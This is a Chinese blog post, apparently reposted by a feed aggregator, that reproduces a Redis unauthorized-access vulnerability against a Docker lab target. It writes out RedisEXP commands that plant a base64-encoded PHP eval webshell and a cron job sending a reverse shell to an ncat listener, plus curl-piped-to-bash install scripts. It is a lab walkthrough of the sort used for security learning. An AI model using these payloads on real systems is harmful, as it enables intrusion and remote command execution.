惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

Y
Y Combinator Blog
Cyber Security Advisories - MS-ISAC
Cyber Security Advisories - MS-ISAC
博客园 - 司徒正美
Blog — PlanetScale
Blog — PlanetScale
博客园 - 聂微东
月光博客
月光博客
量子位
大猫的无限游戏
大猫的无限游戏
Stack Overflow Blog
Stack Overflow Blog
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
The Cloudflare Blog
P
Proofpoint News Feed
B
Blog RSS Feed
美团技术团队
腾讯CDC
C
Check Point Blog
Engineering at Meta
Engineering at Meta
F
Fortinet All Blogs
N
Netflix TechBlog - Medium
Recent Announcements
Recent Announcements
J
Java Code Geeks
S
SegmentFault 最新的问题
WordPress大学
WordPress大学
宝玉的分享
宝玉的分享

lololowe的博客

NAT 回流解决方案 M-LAG跨设备链路聚合组 mDNS简介与配置 PVE通过 Cloud-init 部署 Cloud Images 教程 给 VSCode 添加网络设备配置的语法高亮 给 VSCode 添加网络设备配置的语法高亮 iStack 堆叠原理及配置 单板级可靠性与设备级可靠性 Eth-Trunk 原理及配置 《防火墙项目化实战 (基于华为eNSP)》笔记 华为VLAN高级特性与协议详解 DNS 跨平台托管 CVE-2026-0073 安卓调试桥漏洞复现 使用 Bettercap 进行 HTTPS 中间人攻击:SSL 剥离和 HSTS 绕过 Yakit测试PortSwigger靶场-未授权访问 visio导入Mermaid流程图(SVG格式) 什么是 TiT (TLS in TLS) 特征以及如何消除特征 部署 Wireguard VPN 实现异地组网 实现防御ARP劫持与主动反击 华为VRP系统基本操作 mrs文件转换与查看 电脑垃圾清理技巧分享 QQ音乐 2015-2025 年度听歌报告链接汇总 基于DevStack快速部署OpenStack
Redis未授权访问漏洞复现
lololowe · 2026-04-07 · via lololowe的博客

AI初始化中...

介绍自己 🙈

生成本文简介 👋

推荐相关文章 📖

前往主页 🏠

前往爱发电购买

网络安全环境配置Redis

部署环境

环境来源:

Docker一键安装脚本(二选一):

1
2
bash <(curl -sL kejilion.sh) docker install
bash <(curl -sSL https://linuxmirrors.cn/docker.sh)

Docker 部署命令:

1
2
docker pull yanglisianthus/redis-unauth-hub
docker run --restart always -d -p 10081:80 -p 10022:22 -p 16379:6379 --name redishub yanglisianthus/redis-unauth-hub

复现漏洞

用 RedisEXP 工具复现漏洞:https://github.com/yuyan-sec/RedisEXP

写 webshell

1
RedisEXP_windows_amd64.exe -m shell -r 10.0.0.5 -p 16379 -rp /var/www/html -rf shell.php -s PD9waHAgZXZhbCgkX1JFUVVFU1RbY21kXSk7Pz4= -b
  • -m shell: 写webshell
  • -r 10.0.0.5: 目标IP
  • -p 16379: 目标端口
  • -rp /var/www/html: 目标路径
  • -rf shell.php: 目标文件名
  • -s PD9waHAgZXZhbCgkX1JFUVVFU1RbY21kXSk7Pz4=: Webshell内容,base64编码后为
  • -b: 解码base64内容

alt text

上图中显示的redis命令,也可以用redis-cli或者navicat等客户端连接工具进行手工复现。

靶机的/var/www/html目录下将生成shell.php文件:

alt text

浏览器访问 http://10.0.0.5:10081/shell.php?cmd=phpinfo(); 可以查看靶机的phpinfo信息:

alt text

或者用蚁剑连接靶机获取shell:

alt text

alt text

写定时任务

攻击机用ncat监听9001端口,等待靶机反弹shell:

1
ncat -lnk 9001

攻击机运行攻击命令:

1
RedisEXP_windows_amd64.exe -m cron -r 10.0.0.5 -p 16379 -L 10.0.100.1 -P 9001
  • -m cron: 写定时任务
  • -r 10.0.0.5: 目标IP
  • -p 16379: 目标端口
  • -L 10.0.100.1: 本机IP
  • -P 9001: 本机端口

运行后每间隔一分钟,靶机就会执行一次定时任务,反弹shell到攻击机:

alt text

alt text

推荐阅读

  1. 浅析Linux下Redis的攻击面(一):https://xz.aliyun.com/news/7569
  2. Redis常见漏洞利用方法总结|Redis未授权访问漏洞利用方式:https://www.ddosi.org/redis-ssh/

头像头像

lololowe

恬淡无为

打赏作者

感谢你赐予我前进的力量

  • Bitcoin

    Bitcoin

  • Ethereum

    Ethereum

本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 lololowe的博客